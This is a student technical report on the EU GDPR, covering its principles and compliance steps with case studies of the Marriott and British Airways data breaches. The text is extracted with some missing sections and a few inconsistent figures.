Professional Documents
Culture Documents
2019 Spring
Student Name:
London Met ID:
College ID:
I confirm that I understand my coursework needs to be submitted online via Google Classroom under the
relevant module page before the deadline in order for my assignment to be accepted and marked. I am
fully aware that late submissions will be treated as non-submission and a marks of zero will be awarded.
Abstract
GDPR is a set of regulation in european law implemented on 25 may 2018 which addresses about the
data protection and privacy in the european union. GDPR primarily focus on setting an individual right
over there data. Lots of company are currently holding the data of different customers with or without
their permission which may result on negative impact on customer in case of data breach or different
research may be conducted on them without their permission. GDPR ensures that the user data are on a
protected manner and they can control their information, retrieve it or delete it permanently whenever
they want. The objective of this technical report is to show the importance of GDPR in an organization
who deals with the sensitive information of their client.
2
List of figures
Table of Contents
3
Abstract.......................................................................................................................................................2
List of figures...............................................................................................................................................3
1. Introduction........................................................................................................................................8
1.1General Information...........................................................................................................................8
1.2 Background problem.........................................................................................................................8
1.3 Current scenario................................................................................................................................9
2. Literature review...................................................................................................................................10
2.1 Short history on data breach...........................................................................................................10
2.2 Principals of GDPR...........................................................................................................................10
2.3 GDPR Compliance............................................................................................................................11
2.4 Advantages and disadvantages of GDPR..........................................................................................12
3. Critical Analysis..................................................................................................................................13
3.1 Case study 1: Marriot hotel data breach...................................................................................13
3.1.1 Background.......................................................................................................................................13
3.1.2 Issue identification........................................................................................................................13
3.1.3 Mitigation..............................................................................................................................14
3.1.4 Case study summary..............................................................................................................14
3.2 Case study 2: British airways data breach......................................................................................14
3.2.1 Background............................................................................................................................15
3.2.3 Issue identification.................................................................................................................15
3.2.2 Mitigation:.............................................................................................................................15
3.2.3 Case study summary..............................................................................................................15
4. Conclusion.........................................................................................................................................16
Bibliography...............................................................................................................................................17
4
1. Introduction
1.1General Information
Over the last 15 years, technology has entered and transformed our lives tremendously. Most
abilities of today’s Internet lead to everyday transactions which demand some personal data
from the users, even for the simplest applications. As a result, huge amount of data is being
collected and synthesized by service providers and spying entities on daily basis. When users
disclose these digital footprints about themselves, they often have no control as to what
companies will do with them which results in a huge information asymmetry [CITATION Bax19 \l
1033 ].
5
information they can create their own different marketing strategy, political party may
influence the election or basically user may get unwanted security hazards when the
information reaches to hackers or cyber bully.
The importance of data protection law in Europe was thrown into focus in the wake of the
Second World War. More specifically, the use of surveillance technology by totalitarian regimes
to commit crimes against humanity, along with advances in computer science, prompted
consideration of the need for data protection legislation. The federal state of Hesse in Germany
was responsible for passing the first data protection legislation in 1971 [CITATION EPRS2019 \l
1033 ].
6
2. Literature review
2.1 Short history on data breach
With the development in technology and dynamic storage devices the lots of company have started to
store the customer information for different purpose. In the recent years those stored data are creating
chows and lots of innocent victims has been found who are completely unaware about the leakage of
their information resulting in fraud and cyber bullying .
The above figure shows that in the number of data breaches shown by blue line and number of data
exposed in millions by black line.
7
2.2 Principals of GDPR
Six principals of GDPR are listed below :
Lawfulness and fairness ensures that the data collected from the user are legal and they aren’t
hiding anything from the data subjects. In order to be transparent the company should make a
privacy policy that clearly stats the type of data they collect and how they use it.
b) Purpose limitation:
Collected for specified, explicit and legitimate purposes and not further processed in a manner
that is incompatible with those purposes; further processing for archiving purposes in the
public interest, scientific or historical research purposes or statistical purposes shall not be
considered to be incompatible with the initial purposes. It states that an organization should
clearly state the purpose for collecting the data and data are only collected if a company has a
genuine reason to collect it.
c) Data minimization:
Adequate, relevant and limited to what is necessary in relation to the purposes for which they
are processed. An organization must only store data. Organizations must only process the
personal data that they need to achieve its processing purposes. Doing so has two major
benefits. First, in the event of a data breach, the unauthorized individual will only have access
to a limited amount of data. Second, data minimization makes it easier to keep data accurate
and up to date.
d) Accuracy:
Accurate and, where necessary, kept up to date; every reasonable step must be taken to ensure
that personal data that are inaccurate, having regard to the purposes for which they are
processed, are erased or rectified without delay. Accuracy ensures that the individual full right
to erase the wrong and incomplete data within 30 days.
e) Storage limitation:
8
Kept in a form which permits identification of data subjects for no longer than is necessary for
the purposes for which the personal data are processed; personal data may be stored for
longer periods insofar as the personal data will be processed solely for archiving purposes in the
public interest, scientific or historical research purposes or statistical purposes subject to
implementation of the appropriate technical and organizational measures required by the
GDPR in order to safeguard the rights and freedoms of individuals
f) Integrity and confidentiality:
Processed in a manner that ensures appropriate security of the personal data, including
protection against unauthorized or unlawful processing and against accidental loss, destruction
or damage, using appropriate technical or organizational measures. Integrity and confidentiality
deals with the security of a data, the data stored on company must be secure and should not be
revealed . The organization should make a proper strategy and policy to make sure that the
user data are in a safe hands.
g) Accountability:
The controller shall be responsible for any potential leakage and other issues [CITATION ICO19 \l
1033 ].
a)Data mapping :
Data mapping helps us understand how data moves inside our company. Mapping a flow of
data will help us identify the area which is causing problem in implementation of GDPR. Data
mapping makes clear about the purpose of data, its type and clearly describes about the use of
data and its proper disposal.
9
Figure 2: Data map example
The figure above shows the simple example of GDPR data map which describes the origin of
data and how it is handled.
b) Privacy policy:
We can always review our privacy policy and GDPR compliance. You must communicate to
individuals the legal basis for processing the data, retention period, the right to complain when
customers are unhappy with your implementation whether their data will be subject to
automatic decision making, their right under the GDPR.
c) Training:
The GDPR is a business change project, the people you work with need to understand the importance of
data protection and be trained on the basic principles of the GDPR and the procedures being
implemented for compliance[CITATION Jam18 \l 1033 ].
10
3. Critical Analysis
3.1 Case study 1: Marriot hotel data breach
3.1.1 Background
On November 30, 2018 Marriott disclosed that the reservation system for their subsidiary
Starwood Hotels & Resorts Worldwide had been breached. Marriott stated the breach had
actually begun in 2014 and was only recently been detected. That’s a horrendously long dwell
time by anyone’s standards. The Marriott structured data store breach resulted in the theft of
highly sensitive personal information of approximately 500 million guests – including names,
mailing addresses, phone numbers, email addresses, passport numbers, and, in some cases,
encrypted payment card information. While Marriott is a U.S corporation many of their guests
over this period will certainly have been citizens of the European Union (EU). As such, the
breach falls under EU GDPR legislation. This means Marriott could face a fine of up to 4% of its
annual revenue which in this case would be $900M.[CITATION DBC18 \l 1033 ].
11
Figure : Marriot data breach [ CITATION Amb18 \l 1033 ].
3.1.3 Mitigation
The GDPR rules were not properly followed as remote access were not monitored properly
and data leakage was not found for four years , so proper implementation of GDPR rules
will be best effective measure. Database security must be the topmost priority and
detecting mechanism should be more effective since it took two years for Marriot to detect
the breach[ CITATION Amb18 \l 1033 ]. It has been seen that the data has been stored for
such a long period of time which may not be used on a daily basis or may not be useful to
the company from the side of user, so according to GDPR rules the data collected must be
deleted permanently after the transaction. So in order to mitigate such flaws in the near
future company can implement the policy on which sensitive data such as credit card
number , phone number, travel history and address will be automatically deleted after
certain period of time
12
3.2 Case study 2: British airways data breach
3.2.1 Background
The data breach suffered by British Airways affected around 380,000 customers and resulted in
the theft of customer data including personal and financial details . The attack was highly
targeted and utilized customized JavaScript/digital card skimmers loaded from a compromised
web server[CITATION Ole18 \l 1033 ].British airways is the largest commercial airline company
and over the course of two week British airways suffered a huge data breach resulting in fine of
183 million for not regulating the GDPR rules properly.
3.2.3 Mitigation:
Best measure to mitigate the data breach is to perform the regular security check and
vulnerability assessment by an expert. As per GDPR rule any personal data stored in a system
should have a genuine reason so the sensitive data which are not required in the future should
be removed automatically in order to reduce the risk in case of data breach. In case of data
breach the incident should be reported to the superior immediately and announce a notice
within 72 hours. The data stored in a database should be encrypted in a proper manner so that
it will provide the extra security. In this case it is seen that code has been injected in the system
so it is the case of an insider threat hence, there should be regular access control check and
the access of the past employees should be removed immediately.
13
3.3.4 Case study summary
In year 2018 British airways suffers huge data breach caused by group called Magecart resulting
in loss of 380,000 data including personal and financial details. Due to lack of proper precaution
hackers were able to inject there code in a system which cause loss of data and company
reputation. It is seen that British airways IT personal are unable to find the flaw in their system
hence resulting in huge fine for not implementing GDPR rules properly.
4. Conclusion
In the modern world data is one of the valueable asset and has a great significance which can
reveal lots of thing about a person. Lots of company are collecting data so that they can be used
in future for different purpose. So all those data should be protected in a proper manner and
used for the benefit of a person only. So GDPR ensures that all the activity that happens with
the data will only be used with permission of user, benefit the user and is in a safe place.
GDPR is a set of rules which has to be followed strictly by the company which ensures the
safety of a data. In the recent days data has been leaked and caused a loss or threat of loss to
the privacy to the user. GDPR rules also explains about the consequences that the company
might face if they do not follow the rules and data gets leaked. GDPR fines the company if the
rules is violated which may be too much resulting in huge financial loss to the company. So
GDPR ensures the safety of a user data by encouraging company to follow the best approaches
to ensure the safety of user data.
14
Bibliography
(2019). Retrieved from infosecurityeurope:
https://www.infosecurityeurope.com/__novadocuments/355669?v=636289786574700000
15
16